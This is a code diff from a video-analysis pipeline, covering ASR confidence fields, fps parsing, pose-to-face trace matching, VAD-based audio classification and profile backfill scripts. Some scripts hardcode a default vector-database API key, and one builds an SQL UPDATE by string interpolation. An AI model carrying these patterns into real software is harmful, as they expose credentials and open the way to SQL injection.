# Read stderr for progress
|
||||
try:
|
||||
import select
|
||||
if select.select([proc.stderr], [], [], 0)[0]:
|
||||
line = proc.stderr.readline().strip()
|
||||
if line and line != last_progress:
|
||||
last_progress = line
|
||||
print(f"[Appearance] {line}", file=sys.stderr)
|
||||
if publisher and "frames" in line:
|
||||
publisher.progress("appearance", 50, 100, line)
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
# Read remaining output
|
||||
stdout, stderr = proc.communicate()
|
||||
if stdout:
|
||||
print(stdout, file=sys.stderr)
|
||||
if stderr:
|
||||
print(stderr, file=sys.stderr)
|
||||
|
||||
elapsed = time.time() - t0
|
||||
|
||||
if proc.returncode != 0:
|
||||
print(f"[Appearance] ERROR: swift_appearance_expansion exited with code {proc.returncode}", file=sys.stderr)
|
||||
if publisher:
|
||||
publisher.error("appearance", f"Process failed with code {proc.returncode}")
|
||||
raise RuntimeError(f"swift_appearance_expansion failed: {proc.returncode}")
|
||||
|
||||
# Load result
|
||||
if not os.path.exists(output_path):
|
||||
print(f"[Appearance] ERROR: Output file not created: {output_path}", file=sys.stderr)
|
||||
raise RuntimeError("Appearance output not created")
|
||||
|
||||
with open(output_path) as f:
|
||||
result = json.load(f)
|
||||
|
||||
frame_count = len(result.get("frames", []))
|
||||
print(f"[Appearance] Done: {frame_count} frames in {elapsed:.1f}s", file=sys.stderr)
|
||||
|
||||
if publisher:
|
||||
publisher.progress("appearance", 100, 100, f"{frame_count} frames")
|
||||
publisher.complete("appearance", f"{frame_count} frames")
|
||||
|
||||
return result
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
parser = argparse.ArgumentParser(description="Appearance Expansion Processor")
|
||||
parser.add_argument("video_path", help="Video file path")
|
||||
parser.add_argument("output_path", help="Output appearance.json path")
|
||||
parser.add_argument("--uuid", "-u", default="", help="File UUID for logging")
|
||||
args = parser.parse_args()
|
||||
|
||||
publisher = RedisPublisher(args.uuid) if args.uuid else None
|
||||
if publisher:
|
||||
publisher.info("appearance", "APPEARANCE_START")
|
||||
|
||||
result = process_appearance(args.video_path, args.output_path, args.uuid, publisher)
|
||||
print(f"Appearance: {len(result.get('frames', []))} frames with appearance")
|
||||
@@ -349,6 +349,7 @@ def run_asr(video_path, output_path, uuid: str = "", fps: float = None):
|
||||
"text": segment.text.strip(),
|
||||
"scene_number": scene_idx + 1,
|
||||
"language": seg_language,
|
||||
"confidence": getattr(segment, "confidence", 0.0),
|
||||
})
|
||||
total_segments += 1
|
||||
|
||||
@@ -396,6 +397,7 @@ def run_asr(video_path, output_path, uuid: str = "", fps: float = None):
|
||||
"start_frame": int(round(segment.start * fps)),
|
||||
"end_frame": int(round(segment.end * fps)),
|
||||
"text": segment.text.strip(),
|
||||
"confidence": getattr(segment, "confidence", 0.0),
|
||||
})
|
||||
total_segments += 1
|
||||
if total_segments % 100 == 0:
|
||||
|
||||
@@ -121,8 +121,19 @@ def _convert_asr_segments_to_asrx(asr_segments, output_path):
|
||||
try:
|
||||
with open(probe_path) as pf:
|
||||
probe_data = json.load(pf)
|
||||
if "fps" in probe_data:
|
||||
fps = float(probe_data["fps"])
|
||||
# Extract fps from streams array (video stream)
|
||||
for stream in probe_data.get("streams", []):
|
||||
if stream.get("codec_type") == "video":
|
||||
if "r_frame_rate" in stream:
|
||||
fps_str = stream["r_frame_rate"]
|
||||
# Parse "24000/1001" format
|
||||
if "/" in fps_str:
|
||||
num, den = fps_str.split("/")
|
||||
if float(den) > 0:
|
||||
fps = float(num) / float(den)
|
||||
else:
|
||||
fps = float(fps_str)
|
||||
break
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
@@ -154,8 +165,19 @@ def _convert_result(result, output_path):
|
||||
try:
|
||||
with open(probe_path) as pf:
|
||||
probe_data = json.load(pf)
|
||||
if "fps" in probe_data:
|
||||
fps = float(probe_data["fps"])
|
||||
# Extract fps from streams array (video stream)
|
||||
for stream in probe_data.get("streams", []):
|
||||
if stream.get("codec_type") == "video":
|
||||
if "r_frame_rate" in stream:
|
||||
fps_str = stream["r_frame_rate"]
|
||||
# Parse "24000/1001" format
|
||||
if "/" in fps_str:
|
||||
num, den = fps_str.split("/")
|
||||
if float(den) > 0:
|
||||
fps = float(num) / float(den)
|
||||
else:
|
||||
fps = float(fps_str)
|
||||
break
|
||||
except Exception:
|
||||
pass
|
||||
|
||||
|
||||
@@ -226,12 +226,24 @@ def process_asrx_custom(video_path: str, output_path: str, uuid: str = ""):
|
||||
try:
|
||||
with open(p) as pf:
|
||||
probe_data = json.load(pf)
|
||||
if "fps" in probe_data:
|
||||
fps = float(probe_data["fps"])
|
||||
print(f"[ASRX] FPS from probe: {fps}", file=sys.stderr)
|
||||
# Extract fps from streams array (video stream)
|
||||
for stream in probe_data.get("streams", []):
|
||||
if stream.get("codec_type") == "video":
|
||||
if "r_frame_rate" in stream:
|
||||
fps_str = stream["r_frame_rate"]
|
||||
# Parse "24000/1001" format
|
||||
if "/" in fps_str:
|
||||
num, den = fps_str.split("/")
|
||||
if float(den) > 0:
|
||||
fps = float(num) / float(den)
|
||||
print(f"[ASRX] FPS from probe: {fps} (from r_frame_rate: {fps_str})", file=sys.stderr)
|
||||
else:
|
||||
fps = float(fps_str)
|
||||
print(f"[ASRX] FPS from probe: {fps}", file=sys.stderr)
|
||||
break
|
||||
break
|
||||
except:
|
||||
pass
|
||||
except Exception as e:
|
||||
print(f"[ASRX] Failed to read probe: {e}", file=sys.stderr)
|
||||
output_result = {
|
||||
"language": None,
|
||||
"segments": [],
|
||||
|
||||
@@ -0,0 +1,235 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Assign trace_ids to poses by matching with face traces.
|
||||
Uses bbox IoU matching to find corresponding face traces.
|
||||
|
||||
Input: face_traced.json, pose.json
|
||||
Output: pose_traced.json
|
||||
"""
|
||||
|
||||
import json
|
||||
import os
|
||||
import argparse
|
||||
from typing import Dict, List, Optional, Any
|
||||
|
||||
|
||||
def calculate_iou(bbox1: Dict, bbox2: Dict) -> float:
|
||||
"""Calculate Intersection over Union for two bboxes."""
|
||||
x1 = max(bbox1["x"], bbox2["x"])
|
||||
y1 = max(bbox1["y"], bbox2["y"])
|
||||
x2 = min(bbox1["x"] + bbox1["width"], bbox2["x"] + bbox2["width"])
|
||||
y2 = min(bbox1["y"] + bbox1["height"], bbox2["y"] + bbox2["height"])
|
||||
|
||||
if x2 <= x1 or y2 <= y1:
|
||||
return 0.0
|
||||
|
||||
intersection = (x2 - x1) * (y2 - y1)
|
||||
area1 = bbox1["width"] * bbox1["height"]
|
||||
area2 = bbox2["width"] * bbox2["height"]
|
||||
union = area1 + area2 - intersection
|
||||
|
||||
return intersection / union if union > 0 else 0.0
|
||||
|
||||
|
||||
def is_face_center_in_pose(face_bbox: Dict, pose_bbox: Dict) -> bool:
|
||||
"""Check if face center is within pose bbox."""
|
||||
face_cx = face_bbox["x"] + face_bbox["width"] // 2
|
||||
face_cy = face_bbox["y"] + face_bbox["height"] // 2
|
||||
|
||||
return (
|
||||
pose_bbox["x"] <= face_cx <= pose_bbox["x"] + pose_bbox["width"] and
|
||||
pose_bbox["y"] <= face_cy <= pose_bbox["y"] + pose_bbox["height"]
|
||||
)
|
||||
|
||||
|
||||
def build_face_lookup(face_traced: Dict) -> Dict[int, List[Dict]]:
|
||||
"""Build frame -> faces lookup from face_traced.json."""
|
||||
lookup = {}
|
||||
|
||||
for trace_id_str, trace in face_traced.get("traces", {}).items():
|
||||
trace_id = int(trace_id_str)
|
||||
for face in trace.get("path", []):
|
||||
frame = face["frame"]
|
||||
if frame not in lookup:
|
||||
lookup[frame] = []
|
||||
lookup[frame].append({
|
||||
"trace_id": trace_id,
|
||||
"bbox": face["bbox"],
|
||||
"confidence": face.get("confidence", 0.5)
|
||||
})
|
||||
|
||||
return lookup
|
||||
|
||||
|
||||
def find_closest_faces(
|
||||
face_lookup: Dict[int, List[Dict]],
|
||||
target_frame: int,
|
||||
max_distance: int = 10
|
||||
) -> List[Dict]:
|
||||
"""
|
||||
Find faces at the closest frame to target_frame.
|
||||
Search within max_distance frames.
|
||||
"""
|
||||
# Check exact frame first
|
||||
if target_frame in face_lookup:
|
||||
return face_lookup[target_frame]
|
||||
|
||||
# Find closest frame
|
||||
face_frames = sorted(face_lookup.keys())
|
||||
closest_frame = None
|
||||
closest_distance = max_distance + 1
|
||||
|
||||
for frame in face_frames:
|
||||
distance = abs(frame - target_frame)
|
||||
if distance < closest_distance:
|
||||
closest_distance = distance
|
||||
closest_frame = frame
|
||||
|
||||
if closest_frame is not None and closest_distance <= max_distance:
|
||||
return face_lookup[closest_frame]
|
||||
|
||||
return []
|
||||
|
||||
|
||||
def match_pose_to_traces(
|
||||
pose_person: Dict,
|
||||
faces_at_frame: List[Dict],
|
||||
frame: int,
|
||||
iou_threshold: float = 0.05
|
||||
) -> Dict:
|
||||
"""
|
||||
Match a pose person to face traces.
|
||||
Uses two strategies:
|
||||
1. IoU matching (lower threshold for body vs face)
|
||||
2. Face center containment (face center within pose bbox)
|
||||
"""
|
||||
matched_traces = []
|
||||
|
||||
for face in faces_at_frame:
|
||||
iou = calculate_iou(pose_person["bbox"], face["bbox"])
|
||||
|
||||
# Strategy 1: IoU matching (lower threshold)
|
||||
if iou > iou_threshold:
|
||||
matched_traces.append({
|
||||
"trace_id": face["trace_id"],
|
||||
"iou": iou,
|
||||
"method": "iou"
|
||||
})
|
||||
# Strategy 2: Face center in pose bbox
|
||||
elif is_face_center_in_pose(face["bbox"], pose_person["bbox"]):
|
||||
matched_traces.append({
|
||||
"trace_id": face["trace_id"],
|
||||
"iou": iou,
|
||||
"method": "center_containment"
|
||||
})
|
||||
|
||||
# Sort by IoU descending
|
||||
matched_traces.sort(key=lambda x: x["iou"], reverse=True)
|
||||
|
||||
# Assign trace_ids
|
||||
trace_ids = [t["trace_id"] for t in matched_traces]
|
||||
|
||||
# Generate pose_id using first trace_id
|
||||
if trace_ids:
|
||||
pose_id = f"pose_{trace_ids[0]}_{frame}"
|
||||
else:
|
||||
pose_id = f"pose_none_{frame}"
|
||||
|
||||
# Update pose person
|
||||
pose_person["pose_id"] = pose_id
|
||||
pose_person["trace_ids"] = trace_ids
|
||||
|
||||
return pose_person
|
||||
|
||||
|
||||
def assign_pose_traces(
|
||||
face_traced_path: str,
|
||||
pose_path: str,
|
||||
output_path: str,
|
||||
iou_threshold: float = 0.3
|
||||
) -> Dict:
|
||||
"""
|
||||
Main function: assign trace_ids to poses.
|
||||
"""
|
||||
# Load face_traced.json
|
||||
print(f"[PoseTrace] Loading face_traced.json: {face_traced_path}")
|
||||
with open(face_traced_path) as f:
|
||||
face_traced = json.load(f)
|
||||
|
||||
# Load pose.json
|
||||
print(f"[PoseTrace] Loading pose.json: {pose_path}")
|
||||
with open(pose_path) as f:
|
||||
pose_data = json.load(f)
|
||||
|
||||
# Build face lookup
|
||||
face_lookup = build_face_lookup(face_traced)
|
||||
print(f"[PoseTrace] Built face lookup: {len(face_lookup)} frames with faces")
|
||||
|
||||
# Process each frame
|
||||
total_poses = 0
|
||||
matched_poses = 0
|
||||
|
||||
for frame_data in pose_data.get("frames", []):
|
||||
frame = frame_data["frame"]
|
||||
|
||||
# Find closest faces (within 10 frames)
|
||||
faces_at_frame = find_closest_faces(face_lookup, frame, max_distance=10)
|
||||
|
||||
for person in frame_data.get("persons", []):
|
||||
total_poses += 1
|
||||
|
||||
# Match pose to traces
|
||||
matched_person = match_pose_to_traces(
|
||||
person, faces_at_frame, frame, iou_threshold
|
||||
)
|
||||
|
||||
if matched_person.get("trace_ids"):
|
||||
matched_poses += 1
|
||||
|
||||
print(f"[PoseTrace] Matched {matched_poses}/{total_poses} poses to traces")
|
||||
|
||||
# Update metadata
|
||||
pose_data["trace_matching"] = {
|
||||
"total_poses": total_poses,
|
||||
"matched_poses": matched_poses,
|
||||
"iou_threshold": iou_threshold
|
||||
}
|
||||
|
||||
# Save pose_traced.json
|
||||
print(f"[PoseTrace] Saving to: {output_path}")
|
||||
with open(output_path, "w") as f:
|
||||
json.dump(pose_data, f, indent=2, ensure_ascii=False)
|
||||
|
||||
return pose_data
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Assign trace_ids to poses")
|
||||
parser.add_argument("--uuid", required=True, help="Video file UUID")
|
||||
parser.add_argument("--iou-threshold", type=float, default=0.3, help="IoU threshold for matching")
|
||||
parser.add_argument("--output-dir", help="Output directory (default: from env)")
|
||||
args = parser.parse_args()
|
||||
|
||||
output_dir = args.output_dir or os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
|
||||
face_traced_path = os.path.join(output_dir, f"{args.uuid}.face_traced.json")
|
||||
pose_path = os.path.join(output_dir, f"{args.uuid}.pose.json")
|
||||
output_path = os.path.join(output_dir, f"{args.uuid}.pose_traced.json")
|
||||
|
||||
# Check input files exist
|
||||
if not os.path.exists(face_traced_path):
|
||||
print(f"[PoseTrace] Error: face_traced.json not found: {face_traced_path}")
|
||||
return 1
|
||||
|
||||
if not os.path.exists(pose_path):
|
||||
print(f"[PoseTrace] Error: pose.json not found: {pose_path}")
|
||||
return 1
|
||||
|
||||
# Run matching
|
||||
assign_pose_traces(face_traced_path, pose_path, output_path, args.iou_threshold)
|
||||
|
||||
return 0
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
exit(main())
|
||||
Executable
+302
@@ -0,0 +1,302 @@
|
||||
#!/opt/homebrew/bin/python3.11
|
||||
"""
|
||||
Audio Track Probe - Audio track detection and VAD classification
|
||||
|
||||
Used during S0 Register phase to classify audio tracks:
|
||||
- no_audio: No audio track
|
||||
- silent_audio: Audio track but no speech detected
|
||||
- music_only: Audio with no speech (music/sound effects)
|
||||
- speech_only: Audio with speech only
|
||||
- speech_with_music: Audio with speech and background music
|
||||
|
||||
Usage:
|
||||
python audio_track_probe.py --file /path/to/video.mp4
|
||||
python audio_track_probe.py --file /path/to/video.mp4 --json
|
||||
|
||||
Output (text):
|
||||
music_only
|
||||
|
||||
Output (JSON):
|
||||
{"classification": "music_only", "speech_ratio": 0.0, "speech_segments": 0, "duration": 93.3}
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import subprocess
|
||||
import sys
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
try:
|
||||
import torch
|
||||
import numpy as np
|
||||
from scipy.io import wavfile
|
||||
HAS_TORCH = True
|
||||
except ImportError:
|
||||
HAS_TORCH = False
|
||||
|
||||
|
||||
def get_audio_tracks(file_path: str) -> list[dict]:
|
||||
"""
|
||||
Get audio track information using ffprobe.
|
||||
|
||||
Returns:
|
||||
List of audio track dicts with: index, codec, channels, language, title
|
||||
"""
|
||||
cmd = [
|
||||
"ffprobe", "-v", "quiet",
|
||||
"-print_format", "json",
|
||||
"-show_streams",
|
||||
"-select_streams", "a",
|
||||
file_path
|
||||
]
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True, text=True)
|
||||
if result.returncode != 0:
|
||||
return []
|
||||
|
||||
data = json.loads(result.stdout)
|
||||
streams = data.get("streams", [])
|
||||
|
||||
tracks = []
|
||||
for s in streams:
|
||||
track = {
|
||||
"index": s.get("index", 0),
|
||||
"codec": s.get("codec_name", "unknown"),
|
||||
"channels": s.get("channels", 2),
|
||||
"language": s.get("tags", {}).get("language", ""),
|
||||
"title": s.get("tags", {}).get("title", ""),
|
||||
}
|
||||
tracks.append(track)
|
||||
|
||||
return tracks
|
||||
|
||||
|
||||
def select_best_track(tracks: list[dict]) -> int | None:
|
||||
"""
|
||||
Select the best audio track for VAD analysis.
|
||||
|
||||
Priority (原聲優先):
|
||||
1. Language = original/und/unknown (assumed original)
|
||||
2. Language matches common original track codes
|
||||
3. Most channels
|
||||
4. First track
|
||||
|
||||
Returns:
|
||||
Stream index of best track, or None if no tracks
|
||||
"""
|
||||
if not tracks:
|
||||
return None
|
||||
|
||||
# Priority 1: original/und/unknown language
|
||||
for t in tracks:
|
||||
lang = t.get("language", "").lower()
|
||||
if lang in ("", "und", "original", "unknown"):
|
||||
return t["index"]
|
||||
|
||||
# Priority 2: common original track languages
|
||||
original_langs = ("zho", "chi", "jpn", "jap", "kor", "tha", "vie")
|
||||
for t in tracks:
|
||||
lang = t.get("language", "").lower()
|
||||
if lang in original_langs:
|
||||
return t["index"]
|
||||
|
||||
# Priority 3: Most channels
|
||||
tracks_sorted = sorted(tracks, key=lambda x: x.get("channels", 0), reverse=True)
|
||||
return tracks_sorted[0]["index"]
|
||||
|
||||
|
||||
def extract_audio_for_vad(file_path: str, stream_index: int | None = None) -> str | None:
|
||||
"""
|
||||
Extract audio to temp WAV file for VAD analysis.
|
||||
|
||||
Returns:
|
||||
Path to temp WAV file, or None if extraction failed
|
||||
"""
|
||||
with tempfile.NamedTemporaryFile(suffix=".wav", delete=False) as f:
|
||||
output_path = f.name
|
||||
|
||||
cmd = ["ffmpeg", "-y", "-v", "quiet"]
|
||||
|
||||
if stream_index is not None:
|
||||
cmd.extend(["-stream_loop", "1", "-i", file_path, "-map", f"0:{stream_index}"])
|
||||
else:
|
||||
cmd.extend(["-i", file_path])
|
||||
|
||||
cmd.extend([
|
||||
"-vn", "-ac", "1", "-ar", "16000",
|
||||
"-acodec", "pcm_s16le",
|
||||
output_path
|
||||
])
|
||||
|
||||
result = subprocess.run(cmd, capture_output=True)
|
||||
if result.returncode != 0:
|
||||
return None
|
||||
|
||||
return output_path
|
||||
|
||||
|
||||
def run_vad_classification(audio_path: str) -> tuple[str, float, int]:
|
||||
"""
|
||||
Run Silero VAD to classify audio.
|
||||
|
||||
Returns:
|
||||
(classification, speech_ratio, speech_segments_count)
|
||||
classification: one of "music_only", "speech_only", "speech_with_music"
|
||||
"""
|
||||
if not HAS_TORCH:
|
||||
return ("speech_only", 0.5, 0) # Default fallback
|
||||
|
||||
try:
|
||||
# Read WAV file using scipy (avoids torchaudio dependency issues)
|
||||
sample_rate, wav_data = wavfile.read(audio_path)
|
||||
|
||||
# Convert to float32 and normalize
|
||||
if wav_data.dtype == np.int16:
|
||||
wav = torch.from_numpy(wav_data.astype(np.float32) / 32768.0)
|
||||
elif wav_data.dtype == np.int32:
|
||||
wav = torch.from_numpy(wav_data.astype(np.float32) / 2147483648.0)
|
||||
elif wav_data.dtype == np.float32:
|
||||
wav = torch.from_numpy(wav_data)
|
||||
else:
|
||||
wav = torch.from_numpy(wav_data.astype(np.float32))
|
||||
|
||||
# Ensure mono
|
||||
if len(wav.shape) > 1:
|
||||
wav = wav[:, 0]
|
||||
|
||||
# Resample to 16kHz if needed
|
||||
if sample_rate != 16000:
|
||||
import torchaudio
|
||||
resampler = torchaudio.transforms.Resample(sample_rate, 16000)
|
||||
wav = resampler(wav)
|
||||
sample_rate = 16000
|
||||
|
||||
# Load VAD model
|
||||
model, utils = torch.hub.load(
|
||||
repo_or_dir="snakers4/silero-vad",
|
||||
model="silero_vad",
|
||||
force_reload=False,
|
||||
trust_repo=True,
|
||||
)
|
||||
model.eval()
|
||||
|
||||
get_speech_timestamps = utils[0]
|
||||
|
||||
speech_timestamps = get_speech_timestamps(
|
||||
wav, model,
|
||||
sampling_rate=16000,
|
||||
min_speech_duration_ms=500,
|
||||
min_silence_duration_ms=300,
|
||||
return_seconds=True,
|
||||
)
|
||||
|
||||
total_duration = len(wav) / 16000.0
|
||||
speech_duration = sum(ts["end"] - ts["start"] for ts in speech_timestamps)
|
||||
speech_ratio = speech_duration / total_duration if total_duration > 0 else 0.0
|
||||
|
||||
# Classification logic:
|
||||
# - speech_ratio < 0.01: music_only (no speech detected)
|
||||
# - speech_ratio >= 0.01 and speech_ratio < 0.3: speech_with_music (sparse speech)
|
||||
# - speech_ratio >= 0.3: speech_only (mostly speech)
|
||||
|
||||
if speech_ratio < 0.01:
|
||||
classification = "music_only"
|
||||
elif speech_ratio < 0.3:
|
||||
classification = "speech_with_music"
|
||||
else:
|
||||
classification = "speech_only"
|
||||
|
||||
return (classification, speech_ratio, len(speech_timestamps))
|
||||
|
||||
except Exception as e:
|
||||
print(f"VAD error: {e}", file=sys.stderr)
|
||||
return ("speech_only", 0.5, 0)
|
||||
|
||||
|
||||
def probe_audio_track(file_path: str) -> dict:
|
||||
"""
|
||||
Main function: probe audio track and classify.
|
||||
|
||||
Returns:
|
||||
dict with: classification, speech_ratio, speech_segments, duration,
|
||||
track_index, track_language, all_tracks
|
||||
"""
|
||||
# Get audio tracks
|
||||
tracks = get_audio_tracks(file_path)
|
||||
|
||||
if not tracks:
|
||||
return {
|
||||
"classification": "no_audio",
|
||||
"speech_ratio": 0.0,
|
||||
"speech_segments": 0,
|
||||
"duration": 0.0,
|
||||
"track_index": None,
|
||||
"track_language": None,
|
||||
"all_tracks": [],
|
||||
}
|
||||
|
||||
# Select best track
|
||||
best_index = select_best_track(tracks)
|
||||
best_track = next((t for t in tracks if t["index"] == best_index), tracks[0])
|
||||
|
||||
# Extract audio for VAD
|
||||
audio_path = extract_audio_for_vad(file_path, best_index)
|
||||
|
||||
if audio_path is None:
|
||||
return {
|
||||
"classification": "silent_audio",
|
||||
"speech_ratio": 0.0,
|
||||
"speech_segments": 0,
|
||||
"duration": 0.0,
|
||||
"track_index": best_index,
|
||||
"track_language": best_track.get("language", ""),
|
||||
"all_tracks": tracks,
|
||||
}
|
||||
|
||||
# Get duration
|
||||
probe_cmd = [
|
||||
"ffprobe", "-v", "quiet",
|
||||
"-print_format", "json",
|
||||
"-show_format",
|
||||
audio_path
|
||||
]
|
||||
probe_result = subprocess.run(probe_cmd, capture_output=True, text=True)
|
||||
duration = 0.0
|
||||
if probe_result.returncode == 0:
|
||||
probe_data = json.loads(probe_result.stdout)
|
||||
duration = float(probe_data.get("format", {}).get("duration", 0))
|
||||
|
||||
# Run VAD
|
||||
classification, speech_ratio, speech_segments = run_vad_classification(audio_path)
|
||||
|
||||
# Cleanup temp file
|
||||
Path(audio_path).unlink(missing_ok=True)
|
||||
|
||||
return {
|
||||
"classification": classification,
|
||||
"speech_ratio": round(speech_ratio, 4),
|
||||
"speech_segments": speech_segments,
|
||||
"duration": round(duration, 2),
|
||||
"track_index": best_index,
|
||||
"track_language": best_track.get("language", ""),
|
||||
"all_tracks": tracks,
|
||||
}
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Audio track probe with VAD classification")
|
||||
parser.add_argument("--file", "-f", required=True, help="Video file path")
|
||||
parser.add_argument("--json", "-j", action="store_true", help="Output as JSON")
|
||||
args = parser.parse_args()
|
||||
|
||||
result = probe_audio_track(args.file)
|
||||
|
||||
if args.json:
|
||||
print(json.dumps(result, indent=2))
|
||||
else:
|
||||
print(result["classification"])
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,149 @@
|
||||
#!/usr/bin/env python3
|
||||
"""One-time backfill: generate .profile.json for all registered files."""
|
||||
|
||||
import json
|
||||
import os
|
||||
import sys
|
||||
import subprocess
|
||||
from datetime import datetime, timezone
|
||||
|
||||
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
DB_URL = os.environ.get("DATABASE_URL", "postgres://accusys@localhost:5432/momentry")
|
||||
PSQL = "/opt/homebrew/Cellar/libpq/18.4/bin/psql"
|
||||
|
||||
|
||||
def query_db(sql):
|
||||
result = subprocess.run(
|
||||
[PSQL, "-U", "accusys", "-d", "momentry", "-t", "-A", "-c", sql],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
if result.returncode != 0:
|
||||
print(f"DB error: {result.stderr}", file=sys.stderr)
|
||||
return []
|
||||
lines = result.stdout.strip().split("\n")
|
||||
return [line for line in lines if line.strip()]
|
||||
|
||||
|
||||
def extract_key_frame(video_path, duration, output_dir, file_uuid):
|
||||
"""Extract a representative frame using ffmpeg, save as JPG."""
|
||||
seek_time = duration * 0.1 if duration > 0 else 1.0
|
||||
out_path = os.path.join(output_dir, f"{file_uuid}.key_frame.jpg")
|
||||
try:
|
||||
result = subprocess.run(
|
||||
[
|
||||
"ffmpeg", "-y", "-ss", f"{seek_time:.2f}",
|
||||
"-i", video_path,
|
||||
"-vframes", "1",
|
||||
"-vf", "scale=640:-1",
|
||||
"-q:v", "5",
|
||||
out_path
|
||||
],
|
||||
capture_output=True, timeout=30
|
||||
)
|
||||
if result.returncode == 0 and os.path.exists(out_path):
|
||||
return f"{file_uuid}.key_frame.jpg"
|
||||
except Exception as e:
|
||||
print(f" key_frame extraction failed: {e}", file=sys.stderr)
|
||||
return None
|
||||
|
||||
|
||||
def main():
|
||||
print(f"Output dir: {OUTPUT_DIR}")
|
||||
print(f"Looking for files without .profile.json...")
|
||||
|
||||
# Get all registered files
|
||||
rows = query_db(
|
||||
"SELECT file_uuid, COALESCE(file_name, ''), COALESCE(file_path, ''), "
|
||||
"COALESCE(file_type, 'unknown'), COALESCE(content_hash, ''), "
|
||||
"COALESCE(duration, 0), COALESCE(width, 0), COALESCE(height, 0), "
|
||||
"COALESCE(fps, 0), COALESCE(total_frames, 0) "
|
||||
"FROM videos ORDER BY created_at"
|
||||
)
|
||||
|
||||
created = 0
|
||||
skipped = 0
|
||||
for row in rows:
|
||||
parts = row.split("|")
|
||||
if len(parts) < 10:
|
||||
continue
|
||||
file_uuid, file_name, file_path, file_type, content_hash, \
|
||||
duration, width, height, fps, total_frames = parts[:10]
|
||||
|
||||
# Compute total_frames from duration * fps if DB value is 0
|
||||
db_total_frames = int(total_frames)
|
||||
duration_f = float(duration)
|
||||
fps_f = float(fps)
|
||||
if db_total_frames <= 0 and duration_f > 0 and fps_f > 0:
|
||||
computed_frames = int(duration_f * fps_f)
|
||||
db_total_frames = computed_frames
|
||||
query_db(
|
||||
f"UPDATE videos SET total_frames = {db_total_frames} WHERE file_uuid = '{file_uuid}'"
|
||||
)
|
||||
|
||||
profile_path = os.path.join(OUTPUT_DIR, f"{file_uuid}.profile.json")
|
||||
if os.path.exists(profile_path):
|
||||
# Patch existing profiles with total_frames=0
|
||||
with open(profile_path) as pf:
|
||||
existing = json.load(pf)
|
||||
if existing.get("metadata", {}).get("total_frames") == 0 and duration_f > 0 and fps_f > 0:
|
||||
existing["metadata"]["total_frames"] = db_total_frames
|
||||
with open(profile_path, "w") as pf:
|
||||
json.dump(existing, pf, indent=2, ensure_ascii=False)
|
||||
print(f" [patched] {file_uuid}: total_frames 0 → {db_total_frames}")
|
||||
skipped += 1
|
||||
continue
|
||||
|
||||
now = datetime.now(timezone.utc).isoformat()
|
||||
parent = os.path.dirname(file_path) if file_path else ""
|
||||
|
||||
profile = {
|
||||
"version": "1.0",
|
||||
"file_uuid": file_uuid,
|
||||
"file_name": file_name,
|
||||
"file_type": file_type,
|
||||
"birth": {
|
||||
"mac_address": "",
|
||||
"birthday": now,
|
||||
"original_path": parent,
|
||||
"original_filename": file_name,
|
||||
"canonical_path": file_path,
|
||||
"content_hash": content_hash if content_hash else None
|
||||
},
|
||||
"current": {
|
||||
"path": file_path,
|
||||
"file_name": file_name,
|
||||
"file_type": file_type
|
||||
},
|
||||
"history": [{
|
||||
"action": "backfilled",
|
||||
"timestamp": now,
|
||||
"path": file_path,
|
||||
"file_name": file_name
|
||||
}],
|
||||
"metadata": {
|
||||
"duration": duration_f,
|
||||
"width": int(width),
|
||||
"height": int(height),
|
||||
"fps": fps_f,
|
||||
"total_frames": db_total_frames
|
||||
} if duration_f > 0 or int(width) > 0 else None,
|
||||
"key_frame": None # will be filled below
|
||||
}
|
||||
|
||||
# Extract key_frame for video files that exist on disk
|
||||
if file_type == "video" and file_path and os.path.exists(file_path):
|
||||
print(f" Extracting key_frame for {file_name}...")
|
||||
kf = extract_key_frame(file_path, float(duration), OUTPUT_DIR, file_uuid)
|
||||
if kf:
|
||||
profile["key_frame"] = kf
|
||||
|
||||
with open(profile_path, "w") as f:
|
||||
json.dump(profile, f, indent=2, ensure_ascii=False)
|
||||
created += 1
|
||||
print(f" Created: {file_uuid}.profile.json ({file_name or 'ZOMBIE'})")
|
||||
|
||||
print(f"\nDone: {created} created, {skipped} skipped (already exist)")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,259 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Backfill trace profiles from Qdrant _faces collection.
|
||||
|
||||
For each (file_uuid, trace_id) group in Qdrant:
|
||||
1. Compute frame_count, start_frame, end_frame, avg_confidence
|
||||
2. Pick representative frame (highest confidence)
|
||||
3. Extract key_frame.jpg from video via ffmpeg
|
||||
4. Crop key_face.jpg from key_frame using representative bbox
|
||||
5. Write output/{file_uuid}/trace_{N}/trace_profile.json
|
||||
|
||||
Usage:
|
||||
python3 backfill_trace_profiles.py [--file-uuid UUID] [--dry-run]
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import os
|
||||
import subprocess
|
||||
import sys
|
||||
import urllib.request
|
||||
import urllib.error
|
||||
from collections import defaultdict
|
||||
|
||||
OUTPUT_DIR = os.environ.get("MOMENTRY_OUTPUT_DIR", "/Users/accusys/momentry/output")
|
||||
QDRANT_URL = os.environ.get("QDRANT_URL", "http://localhost:6333")
|
||||
QDRANT_API_KEY = os.environ.get("QDRANT_API_KEY", "Test3200Test3200Test3200")
|
||||
FACES_COLLECTION = "_faces"
|
||||
BATCH_SIZE = 1000
|
||||
|
||||
|
||||
def qdrant_scroll(filter_dict, limit=BATCH_SIZE, offset=None, with_payload=None):
|
||||
"""Scroll Qdrant collection with filter."""
|
||||
body = {"limit": limit, "filter": filter_dict, "with_vector": False}
|
||||
if offset:
|
||||
body["offset"] = offset
|
||||
if with_payload:
|
||||
body["with_payload"] = with_payload
|
